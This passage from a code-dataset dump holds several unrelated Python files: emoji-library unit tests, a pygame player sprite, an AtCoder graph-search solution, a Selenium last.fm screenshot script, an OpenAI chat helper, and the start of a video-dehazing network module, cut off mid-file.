':flag_for_Côte_d’Ivoire:': u'\\U0001F1E8\\U0001F1EE',\n ':flag_for_Åland_Islands:': u'\\U0001F1E6\\U0001F1FD',\n ':flag_for_São_Tomé_&_Príncipe:': u'\\U0001F1F8\\U0001F1F9',\n ':flag_for_Curaçao:': u'\\U0001F1E8\\U0001F1FC'\n }\n string = ' complicated! '.join(list(name_code.keys()))\n actual = emoji.emojize(string, False)\n expected = string\n for name, code in name_code.items():\n expected = expected.replace(name, code)\n expected = emoji.emojize(actual, False)\n assert expected == actual, '%s != %s' % (expected, actual)\n\n\ndef test_emojize_languages():\n for lang_code, emoji_pack in emoji.EMOJI_UNICODE.items():\n for name, emj in emoji_pack.items():\n assert emoji.emojize(name, language=lang_code) == emj\n\n\ndef test_demojize_languages():\n for lang_code, emoji_pack in emoji.EMOJI_UNICODE.items():\n for name, emj in emoji_pack.items():\n assert emoji.demojize(emj, language=lang_code) == name\n\n\ndef test_emojize_variant():\n def remove_variant(s): return re.sub(u'[\\ufe0e\\ufe0f]$', '', s)\n\n assert emoji.emojize(\n ':Taurus:', variant=None) == emoji.EMOJI_UNICODE['en'][':Taurus:']\n assert emoji.emojize(':Taurus:', variant=None) == emoji.emojize(':Taurus:')\n assert emoji.emojize(':Taurus:', variant='text_type') == remove_variant(\n emoji.EMOJI_UNICODE['en'][':Taurus:']) + u'\\ufe0e'\n assert emoji.emojize(':Taurus:', variant='emoji_type') == remove_variant(\n emoji.EMOJI_UNICODE['en'][':Taurus:']) + u'\\ufe0f'\n\n assert emoji.emojize(\n ':admission_tickets:', variant=None) == emoji.EMOJI_UNICODE['en'][':admission_tickets:']\n assert emoji.emojize(':admission_tickets:', variant=None) == emoji.emojize(\n ':admission_tickets:')\n assert emoji.emojize(':admission_tickets:', variant='text_type') == remove_variant(\n emoji.EMOJI_UNICODE['en'][':admission_tickets:']) + u'\\ufe0e'\n assert emoji.emojize(':admission_tickets:', variant='emoji_type') == remove_variant(\n emoji.EMOJI_UNICODE['en'][':admission_tickets:']) + u'\\ufe0f'\n\n with pytest.raises(ValueError):\n emoji.emojize(':admission_tickets:', variant=False)\n\n with pytest.raises(ValueError):\n emoji.emojize(':admission_tickets:', variant=True)\n\n with pytest.raises(ValueError):\n emoji.emojize(':admission_tickets:', variant='wrong')\n\n assert emoji.emojize(\":football:\", use_aliases=False) == ':football:'\n assert emoji.emojize(\":football:\", variant=\"text_type\",\n use_aliases=False) == ':football:'\n assert emoji.emojize(\":football:\", use_aliases=True) == u'\\U0001F3C8'\n assert emoji.emojize(\":football:\", variant=\"emoji_type\",\n use_aliases=True) == u'\\U0001F3C8'\n\n\ndef test_demojize_removes_variant():\n # demojize should remove all variant indicators \\ufe0e and \\ufe0f from the string\n text = \"\".join([emoji.emojize(':Taurus:', variant='text_type'),\n emoji.emojize(':Taurus:', variant='emoji_type'),\n emoji.emojize(':admission_tickets:', variant='text_type'),\n emoji.emojize(':admission_tickets:', variant='emoji_type'),\n emoji.emojize(':alien:', variant='text_type'),\n emoji.emojize(':alien:', variant='emoji_type'),\n emoji.emojize(':atom_symbol:', variant='text_type'),\n emoji.emojize(':atom_symbol:', variant='emoji_type')])\n\n for lang_code in emoji.UNICODE_EMOJI:\n result = emoji.demojize(text, language=lang_code)\n assert '\\ufe0e' not in result\n assert '\\ufe0f' not in result\n\n\ndef test_emojize_invalid_emoji():\n string = '__---___--Invalid__--__-Name'\n assert emoji.emojize(string, False) == string\n\n string = ':: baby:: :_: : : : : :-: :+:'\n assert emoji.emojize(string, False) == string\n\n\ndef test_alias():\n # When use_aliases=False aliases should be passed through untouched\n assert emoji.emojize(':soccer:', use_aliases=False) == ':soccer:'\n assert emoji.emojize(':soccer:', use_aliases=True) == u'\\U000026BD'\n assert emoji.emojize(':football:', use_aliases=False) == ':football:'\n assert emoji.emojize(':football:', use_aliases=True) == u'\\U0001F3C8'\n # Multiple aliases for one emoji:\n assert emoji.emojize(':thumbsup:', use_aliases=True) == emoji.emojize(\n ':+1:', use_aliases=True)\n assert emoji.emojize(':thumbsup:', use_aliases=True) == emoji.emojize(\n ':thumbs_up:', use_aliases=True)\n assert emoji.emojize(':thumbsup:', use_aliases=True) == u'\\U0001f44d'\n\n thumbsup = u'\\U0001f44d'\n assert emoji.demojize(thumbsup, use_aliases=True) != thumbsup\n assert emoji.demojize(thumbsup, use_aliases=True) != ':thumbs_up:'\n assert emoji.demojize(thumbsup, use_aliases=True) != emoji.demojize(\n thumbsup, use_aliases=False)\n\n thailand = u'🇹🇭'\n assert emoji.demojize(thailand, use_aliases=True) != thailand\n assert emoji.demojize(thailand, use_aliases=True) != ':Thailand:'\n assert emoji.demojize(thailand, use_aliases=True) != emoji.demojize(\n thailand, use_aliases=False)\n assert emoji.demojize(thailand, use_aliases=True, version=1.0) != emoji.demojize(\n thailand, use_aliases=True)\n\n # No alias\n for emj, emoji_data in emoji.EMOJI_DATA.items():\n if emoji_data['status'] != emoji.STATUS['fully_qualified']:\n continue\n if 'alias' not in emoji_data:\n assert emoji.emojize(emoji_data['en'], use_aliases=True) != emoji_data['en']\n assert emoji.demojize(emj, use_aliases=True) == emoji_data['en']\n\n # language='alias'\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"en\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', language=\"alias\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', language=\"alias\", use_aliases=True) == thailand\n assert emoji.demojize(thailand, use_aliases=True, language=\"en\") == ':flag_for_Thailand:'\n assert emoji.demojize(thailand, language=\"alias\") ==':flag_for_Thailand:'\n assert emoji.demojize(thailand, language=\"alias\", use_aliases=True) ==':flag_for_Thailand:'\n\n\ndef test_invalid_alias():\n # Invalid aliases should be passed through untouched\n assert emoji.emojize(':tester:', use_aliases=True) == ':tester:'\n assert emoji.emojize(':footbal:', use_aliases=True) == ':footbal:'\n assert emoji.emojize(':socer:', use_aliases=True) == ':socer:'\n assert emoji.emojize(':socer:', use_aliases=True,\n variant=\"text_type\") == ':socer:'\n\n\ndef test_alias_wrong_language():\n # Alias with wrong languages\n thailand = u'🇹🇭'\n with pytest.warns(UserWarning) as w:\n emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"es\")\n with pytest.warns(UserWarning) as w:\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"de\") == thailand\n with pytest.warns(UserWarning) as w:\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"es\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=False, language=\"es\") == ':flag_for_Thailand:'\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"en\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=False, language=\"alias\") == thailand\n assert emoji.emojize(':flag_for_Thailand:', use_aliases=True, language=\"alias\") == thailand\n\n with pytest.warns(UserWarning) as w:\n emoji.demojize(thailand, use_aliases=True, language=\"es\")\n with pytest.warns(UserWarning) as w:\n assert emoji.demojize(thailand, use_aliases=True, language=\"es\") == ':flag_for_Thailand:'\n assert emoji.demojize(thailand, use_aliases=False, language=\"es\") == ':bandera_tailandia:'\n assert emoji.demojize(thailand, use_aliases=True, language=\"en\") == ':flag_for_Thailand:'\n assert emoji.demojize(thailand, use_aliases=False, language=\"alias\") == ':flag_for_Thailand:'\n assert emoji.demojize(thailand, use_aliases=True, language=\"alias\") == ':flag_for_Thailand:'\n\n\ndef test_demojize_name_only():\n for emj, item in emoji.EMOJI_DATA.items():\n if item['status'] != emoji.STATUS['fully_qualified']:\n continue\n for lang_code in emoji.UNICODE_EMOJI:\n if not lang_code in item:\n continue\n name = item[lang_code]\n oneway = emoji.emojize(name, use_aliases=False, language=lang_code)\n assert oneway == emj\n roundtrip = emoji.demojize(oneway, language=lang_code)\n assert name == roundtrip, '%s != %s' % (name, roundtrip)\n\n\ndef test_demojize_complicated_string():\n constructed = u'testing :baby::emoji_modifier_fitzpatrick_type-3: with :eyes: :eyes::eyes: modifiers :baby::emoji_modifier_fitzpatrick_type-5: to symbols ヒㇿ'\n emojid = emoji.emojize(constructed)\n destructed = emoji.demojize(emojid)\n assert constructed == destructed, '%s != %s' % (constructed, destructed)\n\n\ndef test_demojize_delimiters():\n for e in [u'\\U000026BD', u'\\U0001f44d', u'\\U0001F3C8']:\n for d in [(\":\", \":\"), (\"a\", \"b\"), (\"!\", \"!!\"), (\"123\", \"456\"), (u\"😁\", u\"👌\")]:\n s = emoji.demojize(e, delimiters=d)\n assert s.startswith(d[0])\n assert s.endswith(d[1])\n\n text = u\"Example of a text with an emoji%sin a sentence\"\n for e in [u'\\U000026BD', u'\\U0001f44d', u'\\U0001F3C8']:\n for d in [(\":\", \":\"), (\"!\", \"-!-\"), (\"-\", \"-\"), (\":\", \"::\"), (\"::\", \"::\"), (u\"😁\", u\"👌\")]:\n text_with_unicode = text % e\n demojized_text = emoji.demojize(text_with_unicode, delimiters=d)\n assert text_with_unicode != demojized_text\n assert e not in demojized_text\n assert emoji.emojize(demojized_text, delimiters=d) == text_with_unicode\n text_with_emoji = text % emoji.demojize(e, delimiters=d)\n assert demojized_text == text_with_emoji\n assert emoji.emojize(text_with_emoji, delimiters=d) == text_with_unicode\n\n\ndef test_emoji_lis():\n assert emoji.emoji_lis('Hi, I am 👌 test')[0]['location'] == 9\n assert emoji.emoji_lis('Hi') == []\n if len('Hello 🇫🇷👌') < 10: # skip these tests on python with UCS-2 as the string length/positions are different\n assert emoji.emoji_lis('Hi, I am fine. 😁') == [\n {'location': 15, 'emoji': '😁'}]\n assert emoji.emoji_lis('Hello 🇫🇷👌') == [\n {'emoji': '🇫🇷', 'location': 6}, {'emoji': '👌', 'location': 8}]\n\n\ndef test_distinct_emoji_lis():\n assert emoji.distinct_emoji_lis('Hi, I am fine. 😁') == ['😁']\n assert emoji.distinct_emoji_lis('Hi') == []\n assert set(emoji.distinct_emoji_lis('Hello 🇫🇷👌')) == {'🇫🇷', '👌'}\n assert emoji.distinct_emoji_lis('Hi, I am fine. 😁😁😁😁') == ['😁']\n\n\ndef test_emoji_list():\n assert emoji.emoji_list('Hi, I am 👌 test')[0]['match_start'] == 9\n assert emoji.emoji_list('Hi') == []\n if len('Hello 🇫🇷👌') < 10: # skip these tests on python with UCS-2 as the string length/positions are different\n assert emoji.emoji_list('Hi, I am fine. 😁') == [\n {'match_start': 15, 'match_end': 16, 'emoji': '😁'}]\n assert emoji.emoji_list('Hello 🇫🇷👌') == [\n {'emoji': '🇫🇷', 'match_start': 6, 'match_end': 8}, {'emoji': '👌', 'match_start': 8, 'match_end': 9}]\n\n\ndef test_distinct_emoji_list():\n assert emoji.distinct_emoji_list('Hi, I am fine. 😁') == ['😁']\n assert emoji.distinct_emoji_list('Hi') == []\n assert set(emoji.distinct_emoji_list('Hello 🇫🇷👌')) == {'🇫🇷', '👌'}\n assert emoji.distinct_emoji_list('Hi, I am fine. 😁😁😁😁') == ['😁']\n\n\ndef test_emoji_count():\n assert emoji.emoji_count('Hi, I am fine. 😁') == 1\n assert emoji.emoji_count('Hi') == 0\n assert emoji.emoji_count('Hello 🇫🇷👌') == 2\n assert emoji.emoji_count('Hello 🇵🇱🍺🇵🇱', unique=True) == 2\n\n\ndef test_replace_emoji():\n assert emoji.replace_emoji(u'Hi, I am fine. 😁') == 'Hi, I am fine. '\n assert emoji.replace_emoji('Hi') == 'Hi'\n assert emoji.replace_emoji('Hello 🇫🇷👌') == 'Hello '\n assert emoji.replace_emoji('Hello 🇫🇷👌', 'x') == 'Hello xx'\n\n def replace(emj, data):\n assert emj in [\"🇫🇷\", \"👌\"]\n return 'x'\n assert emoji.replace_emoji('Hello 🇫🇷👌', replace) == 'Hello xx'\n\n\ndef test_is_emoji():\n assert emoji.is_emoji('😁')\n assert not emoji.is_emoji('H')\n assert emoji.is_emoji('🇫🇷')\n\n\ndef test_long_emoji():\n assert emoji.demojize('This is \\U0001F9D1\\U0001F3FC\\U0000200D\\U0001F37C example text') == 'This is :person_feeding_baby_medium-light_skin_tone: example text'\n assert emoji.demojize('This is \\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f468\\U0001f3ff example text \\U0001F469\\U0001F3FB\\U0000200D\\U0001F91D\\U0000200D\\U0001F468\\U0001F3FF') == 'This is :couple_with_heart_man_man_dark_skin_tone: example text :woman_and_man_holding_hands_light_skin_tone_dark_skin_tone:'\n assert emoji.demojize('This is \\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f468\\U0001f3ff\\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f48b\\u200d\\U0001f468\\U0001f3ff example text \\U0001F469\\U0001F3FB\\U0000200D\\U0001F91D\\U0000200D\\U0001F468\\U0001F3FF') == 'This is :couple_with_heart_man_man_dark_skin_tone::kiss_man_man_dark_skin_tone: example text :woman_and_man_holding_hands_light_skin_tone_dark_skin_tone:'\n assert emoji.demojize('\\U0001F46B\\U0001F3FB This is \\U0001f468\\U0001f3ff\\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f468\\U0001f3ff\\U0001f468\\U0001f3ff\\u200d\\u2764\\ufe0f\\u200d\\U0001f48b\\u200d\\U0001f468\\U0001f3ff example text \\U0001F469\\U0001F3FB\\U0000200D\\U0001F91D\\U0000200D\\U0001F468\\U0001F3FF') == ':woman_and_man_holding_hands_light_skin_tone: This is :man_dark_skin_tone::couple_with_heart_man_man_dark_skin_tone::kiss_man_man_dark_skin_tone: example text :woman_and_man_holding_hands_light_skin_tone_dark_skin_tone:'\n assert emoji.demojize('\\U0001F46B\\U0001F3FB\\U0001F46B\\U0001F3FB\\U0001F469\\U0001F3FB\\U0000200D\\U0001F91D\\U0000200D\\U0001F468\\U0001F3FF\\U0001FAF1\\U0001F3FD\\U0001FAF1\\U0001F3FD\\U0000200D\\U0001FAF2\\U0001F3FF') == ':woman_and_man_holding_hands_light_skin_tone::woman_and_man_holding_hands_light_skin_tone::woman_and_man_holding_hands_light_skin_tone_dark_skin_tone::rightwards_hand_medium_skin_tone::handshake_medium_skin_tone_dark_skin_tone:'\n s = \":crossed_fingers_medium-light_skin_tone::crossed_fingers::crossed_fingers_dark_skin_tone:\"\n assert emoji.demojize(emoji.demojize(s)) == s\n\n\ndef test_untranslated():\n for emj, item in emoji.EMOJI_DATA.items():\n if item['status'] != emoji.STATUS['fully_qualified']:\n continue\n if 'es' not in item:\n # untranslated\n value = emoji.emojize(item['en'], language='en')\n roundtrip = emoji.demojize(value, language='es')\n assert roundtrip == value, '%s != %s (from %s)' % (ascii(roundtrip), ascii(value), item['en'])\n else:\n # translated\n value = emoji.emojize(item['en'], language='en')\n roundtrip = emoji.demojize(value, language='es')\n assert roundtrip == item['es'], '%s != %s' % (roundtrip, item['es'])\n\n\ndef test_text():\n UCS2 = len('Hello 🇫🇷👌') > 9 # don't break up characters on python with UCS-2\n\n text = u\"\"\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\nUt enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.\nExcepteur sint occaecat in reprehenderit in cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\nStróż pchnął kość w quiz gędźb vel fax myjń.\nHøj bly gom vandt fræk sexquiz på wc.\nСъешь же ещё этих мягких французских булок, да выпей чаю.\nЗа миг бях в чужд плюшен скърцащ фотьойл.\nهلا سكنت بذي ضغثٍ فقد زعموا — شخصت تطلب ظبياً راح مجتازا\nשפן אכל קצת גזר בטעם חסה, ודי\nऋषियों को सताने वाले दुष्ट राक्षसों के राजा रावण का सर्वनाश करने वाले विष्णुवतार भगवान श्रीराम, अयोध्या के महाराज दशरथ के बड़े सपुत्र थे।\nとりなくこゑす ゆめさませ みよあけわたる ひんかしを そらいろはえて おきつへに ほふねむれゐぬ もやのうち\n視野無限廣,窗外有藍天\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.\nExcepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\"\"\"\n\n def add_random_emoji(text, lst, select=lambda emj_data: emj_data['en']):\n\n text = text\n\n emoji_list = []\n text_with_unicode = u\"\"\n text_with_placeholder = u\"\"\n for i in range(0, len(text), 10):\n while True:\n emj, emj_data = random.choice(lst)\n placeholder = select(emj_data)\n if placeholder:\n break\n\n if UCS2:\n j = text.find(u\" \", i, i + 10)\n if j == -1:\n continue\n else:\n j = random.randint(i, i + 10)\n\n text_with_unicode += text[i:j]\n text_with_unicode += emj\n text_with_unicode += text[j:i + 10]\n\n text_with_placeholder += text[i:j]\n text_with_placeholder += placeholder\n text_with_placeholder += text[j:i + 10]\n\n emoji_list.append(emj)\n\n return text_with_unicode, text_with_placeholder, emoji_list\n\n def clean(s):\n return s.replace(u'\\u200d', '').replace(u'\\ufe0f', '')\n\n all_emoji_list = list(emoji.EMOJI_DATA.items())\n qualified_emoji_list = list((emj, item) for emj, item in emoji.EMOJI_DATA.items() if item['status'] == emoji.STATUS['fully_qualified'])\n\n # qualified emoji\n text_with_unicode, text_with_placeholder, emoji_list = add_random_emoji(text, qualified_emoji_list)\n assert emoji.demojize(text_with_unicode) == text_with_placeholder\n assert emoji.emojize(text_with_placeholder) == text_with_unicode\n if not UCS2:\n assert emoji.replace_emoji(text_with_unicode, u'') == text\n assert set(emoji.distinct_emoji_lis(text_with_unicode)) == set(emoji_list)\n for i, lis in enumerate(emoji.emoji_lis(text_with_unicode)):\n assert lis['emoji'] == emoji_list[i]\n\n # qualified emoji from \"es\"\n selector = lambda emoji_data: emoji_data[\"es\"] if \"es\" in emoji_data else False\n text_with_unicode, text_with_placeholder, emoji_list = add_random_emoji(text, qualified_emoji_list, selector)\n assert emoji.demojize(text_with_unicode, language=\"es\") == text_with_placeholder\n assert emoji.emojize(text_with_placeholder, language=\"es\") == text_with_unicode\n if not UCS2:\n assert emoji.replace_emoji(text_with_unicode, u'') == text\n assert set(emoji.distinct_emoji_lis(text_with_unicode)) == set(emoji_list)\n for i, lis in enumerate(emoji.emoji_lis(text_with_unicode)):\n assert lis['emoji'] == emoji_list[i]\n\n # qualified emoji from \"alias\"\n selector = lambda emoji_data: emoji_data[\"alias\"][0] if \"alias\" in emoji_data else False\n text_with_unicode, text_with_placeholder, emoji_list = add_random_emoji(text, qualified_emoji_list, selector)\n assert emoji.demojize(text_with_unicode, use_aliases=True) == text_with_placeholder\n assert emoji.emojize(text_with_placeholder, use_aliases=True) == text_with_unicode\n if not UCS2:\n assert emoji.replace_emoji(text_with_unicode, u'') == text\n assert set(emoji.distinct_emoji_lis(text_with_unicode)) == set(emoji_list)\n for i, lis in enumerate(emoji.emoji_lis(text_with_unicode)):\n assert lis['emoji'] == emoji_list[i]\n\n # all emoji\n text_with_unicode, text_with_placeholder, emoji_list = add_random_emoji(text, all_emoji_list)\n assert emoji.demojize(text_with_unicode) == text_with_placeholder\n assert clean(emoji.emojize(text_with_placeholder)) == clean(text_with_unicode)\n if not UCS2:\n assert emoji.replace_emoji(text_with_unicode, u'') == text\n assert set(emoji.distinct_emoji_lis(text_with_unicode)) == set(emoji_list)\n for i, lis in enumerate(emoji.emoji_lis(text_with_unicode)):\n assert lis['emoji'] == emoji_list[i]\n\n\ndef test_text_multiple_times():\n # Run test_text() multiple times because it relies on a random text\n for i in range(100):\n test_text()\n\n\ndef test_invalid_chars():\n invalidchar = u\"\\U0001F20F\"\n assert emoji.demojize(invalidchar) == invalidchar, \"%r != %r\" % (ascii(emoji.demojize(invalidchar)), ascii(invalidchar))\n assert emoji.demojize(invalidchar) == invalidchar, \"%r != %r\" % (ascii(emoji.demojize(invalidchar)), ascii(invalidchar))\n\n invalidchar = u\"u\\2302 ⌂\"\n assert emoji.demojize(invalidchar) == invalidchar, \"%r != %r\" % (ascii(emoji.demojize(invalidchar)), ascii(invalidchar))\n assert emoji.demojize(invalidchar) == invalidchar, \"%r != %r\" % (ascii(emoji.demojize(invalidchar)), ascii(invalidchar))\n\n\ndef test_combine_with_component():\n text = u\"Example of a combined emoji%sin a sentence\"\n\n combined = emoji.emojize(text % u\":woman_dark_skin_tone:\")\n seperated = emoji.emojize(text % u\":woman::dark_skin_tone:\")\n assert combined == seperated, \"%r != %r\" % (ascii(combined), ascii(seperated))\n\n combined = emoji.emojize(text % u\":woman_dark_skin_tone_white_hair:\")\n seperated = emoji.emojize(text % u\":woman::dark_skin_tone:\\u200d:white_hair:\")\n assert combined == seperated, \"%r != %r\" % (ascii(combined), ascii(seperated))\n","repo_name":"ivanDourado/guanabaraPython","sub_path":"mundo1/emoji-1.7.0/tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":23006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42656624288","text":"import pygame\nfrom bullet import Bullet\n\nclass Player(pygame.sprite.Sprite):\n\n def __init__(self, pos):\n super().__init__()\n # self.image = pygame.Surface((32, 64))\n # self.image.fill(\"red\")\n self.image = pygame.image.load(\"/Users/ben/PycharmProjects/pythonProject3/prototype1/graphics/player/galaga.png\")\n self.rect= self.image.get_rect(topleft=pos)\n self.direction = pygame.math.Vector2(0, 0)\n self.speed = 8\n\n self.bullets = pygame.sprite.Group()\n\n #SHOOTING\n self.firing = False\n\n\n def get_input(self):\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_RIGHT]:\n self.direction.x = 1\n elif keys[pygame.K_LEFT]:\n self.direction.x = -1\n elif keys[pygame.K_UP]:\n self.direction.y = -1\n elif keys[pygame.K_DOWN]:\n self.direction.y = 1\n else:\n self.direction.x = 0\n self.direction.y = 0\n if keys[pygame.K_SPACE] and not self.firing:\n self.fire()\n self.firing = True\n elif not keys [pygame.K_SPACE] and self.firing:\n self.firing = False\n\n def fire(self):\n bullet = Bullet((self.rect.centerx, self.rect.centery), self.direction.x)\n self.bullets.add(bullet)\n\n def update(self, enemies):\n self.get_input()\n self.rect.x += self.direction.x * self.speed\n self.rect.y += self.direction.y * self.speed\n self.bullets.update()\n\n def draw_bullets(self, surface):\n self.bullets.draw(surface)\n","repo_name":"superhippo9/pythonProject3","sub_path":"prototype1/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72160614454","text":"# Pypy じゃなくて Python3.8.2 にしたら AC した。。。\nimport sys\nsys.setrecursionlimit(10**9)\n \n\nclass Node:\n def __init__(self, idx) -> None:\n self.idx = idx\n self.checked = False\n self.dests = []\n \n\ndef run(n,x,y,uv):\n nodes = []\n for i in range(n+1):\n nodes.append(Node(i))\n \n for e in uv:\n nodes[e[0]].dests.append(e[1])\n nodes[e[1]].dests.append(e[0])\n \n n = nodes[x]\n\n # dfs すると TLE 数問と WA 数問、、、 WA に関しては何でかよくわからん\n # → parents と children みたいにしてたからおかしくなってたっぽい... TLE は変わらんけど WA はなくなった\n if dfs(nodes, y, n):\n ans.append(x)\n ans.reverse()\n \n # print(' '.join(map(str, ans)))\n print(*ans)\n\n\nans = []\ndef dfs(nodes, y, node):\n node.checked = True\n if y in node.dests:\n ans.append(y)\n return True\n \n for d in node.dests:\n node = nodes[d]\n if node.checked:\n continue\n if dfs(nodes, y, node):\n ans.append(node.idx)\n return True\n\n\nif __name__ == '__main__':\n n,x,y = map(int, input().split())\n uv = [list(map(int, input().split())) for _ in range(n-1)]\n run(n,x,y,uv)","repo_name":"NozomiTakiguchi/atcoder","sub_path":"src/ABC270/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74621057333","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom datetime import date\nimport sys\nimport time\n\nuser_name = sys.argv[1]\n\noptions = webdriver.ChromeOptions()\noptions.headless = True\ndriver = webdriver.Chrome(options=options)\n\nURL = 'https://www.last.fm/user/'+user_name+'/listening-report/week'\n\ndriver.get(URL)\n\nbutton = driver.find_element_by_id('onetrust-accept-btn-handler')\nbutton.click()\n\nS = lambda l: driver.execute_script('return document.body.parentNode.scroll'+l)\ndriver.set_window_size(S('Width'),S('Height')) \ntime.sleep(3) \ndriver.find_element_by_tag_name('body').screenshot('lastfm_'+date.today().strftime(\"%Y %m %d\") +'.png')\n\n\ndriver.quit()","repo_name":"adrianturtoczki/lastweekinmusic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9010028962","text":"from config import BOT_PRE_PROMPT, OPEN_AI_MODEL, OPEN_AI_TEMPERATURE, OPEN_AI_MAX_TOKENS\n\ndef openai_chat_completion(message_for_openai, message, openai):\n response = openai.ChatCompletion.create(\n model=OPEN_AI_MODEL,\n max_tokens=OPEN_AI_MAX_TOKENS,\n n=1,\n stop=None,\n temperature=OPEN_AI_TEMPERATURE,\n user=str(message.chat.id),\n messages=[\n {\"role\": \"system\", \"content\": BOT_PRE_PROMPT},\n {\"role\": \"user\", \"content\": message_for_openai},\n ]\n )\n return response['choices'][0]['message']['content']","repo_name":"petrutaraul/ema","sub_path":"openai_chat_completion.py","file_name":"openai_chat_completion.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34594029853","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport einops\n\nfrom .map_modules import ResidualBlocksWithInputConv\nfrom .map_stda import STDABlock\nfrom .map_utils import get_discrete_values, get_flow_from_grid, flow_warp_5d\n\nfrom mmcv.cnn import ConvModule\nfrom mmcv.runner import BaseModule, load_checkpoint\nfrom mmedit.models import builder\nfrom mmedit.models.common import PixelShufflePack\nfrom mmedit.models.registry import BACKBONES\nfrom mmedit.utils import get_root_logger\n\n\nclass PriorDecodeLayer(nn.Module):\n\n def __init__(self,\n channels,\n level,\n upsample=True,\n num_trans_bins=32,\n memory_enhance=True):\n super().__init__()\n self.level = level\n\n self.upsample = upsample\n if upsample:\n self.up = PixelShufflePack(channels, channels, 2, 3)\n scale_head = [\n ConvModule(channels, channels, 3, padding=1)\n for _ in range(2)]\n self.scale_head = nn.Sequential(*scale_head)\n\n self.num_trans_bins = num_trans_bins\n self.head_t = nn.Sequential(\n nn.Conv2d(channels, channels, 3, 1, 1), nn.LeakyReLU(negative_slope=0.1, inplace=True),\n nn.Conv2d(channels, num_trans_bins, 1, 1, 0))\n self.head_a = nn.Sequential(\n nn.AdaptiveAvgPool2d(1),\n nn.Conv2d(channels, channels, 1, 1, 0), nn.LeakyReLU(negative_slope=0.1, inplace=True),\n nn.Conv2d(channels, 1, 1, 1, 0), nn.Sigmoid())\n\n self.memory_enhance = memory_enhance\n\n def forward(self, feats):\n level = self.level\n #\n enc_skip = feats['spatial_p'][-1][level]\n if self.upsample:\n feat = enc_skip + self.up(feats['decode_p'][-1][level + 1])\n feat = self.scale_head(feat)\n else:\n feat = enc_skip\n feats['decode_p'][-1][level] = feat\n\n # MPG: estimate t and A\n logit_t = self.head_t(feat)\n prob_t = torch.softmax(logit_t, dim=1) # b, num_trans_bins, h, w\n b, d, h, w = prob_t.shape\n values = get_discrete_values(self.num_trans_bins, 0., 1.) \\\n .view(1, self.num_trans_bins, 1, 1).to(prob_t.device).repeat(b, 1, h, w)\n out_t = (prob_t * values).sum(dim=1, keepdim=True)\n out_a = self.head_a(feat)\n feats['stage_t'][level] = out_t\n feats['stage_a'][level] = out_a\n\n # MPG: memory enhance\n if self.memory_enhance:\n # prior token\n token_p = feat.unsqueeze(2) * prob_t.unsqueeze(1) # b, c, d, h, w\n token_p = token_p.mean(dim=(-2, -1)) # b, c, d\n feats['token_p'][-1][level] = token_p\n\n # retrieve memory\n mem_p = [x[level] for x in feats['token_p']]\n mem_p = torch.stack(mem_p, dim=1) # b, N, c, d\n b, N, c, d = mem_p.shape\n mem_p = mem_p.transpose(-2, -1).reshape(b, N * d, c).contiguous() # b, Nd, c\n # read memory & attention\n _, _, h, w = feat.shape\n q_p = feat.permute(0, 2, 3, 1).reshape(b, h * w, c).contiguous() # b, hw, c\n scale = c ** -0.5\n attn = (q_p @ mem_p.transpose(-2, -1)) * scale # b, hw, Nd\n attn = F.softmax(attn, dim=-1)\n en_p = attn @ mem_p # b, hw, c\n en_p = en_p.reshape(b, h, w, c).permute(0, 3, 1, 2).contiguous() # b, c, h, w\n feats['enhance_p'][-1][level] = en_p\n else:\n feats['enhance_p'][-1][level] = feat\n\n return feats\n\n\nclass SceneDecodeLayer(nn.Module):\n\n def __init__(self,\n channels,\n level,\n upsample=True,\n prior_guide=True,\n num_kv_frames=3,\n align_depth=1,\n num_heads=1,\n kernel_size=3):\n super().__init__()\n self.level = level\n\n self.upsample = upsample\n if upsample:\n self.up = PixelShufflePack(channels, channels, 2, 3)\n\n self.prior_guide = prior_guide\n if prior_guide:\n self.guide_conv = ResidualBlocksWithInputConv(channels * 2, channels, 2)\n\n if not isinstance(num_kv_frames, (list, tuple)):\n num_kv_frames = list(range(1, num_kv_frames + 1))\n else:\n num_kv_frames = sorted(num_kv_frames)\n self.num_kv_frames = num_kv_frames\n self.align_layer = STDABlock(\n channels, num_heads=num_heads,\n align_depth=align_depth, dw_ks=kernel_size)\n\n self.aggre_beta = nn.Parameter(torch.ones(1))\n self.aggre_conv = 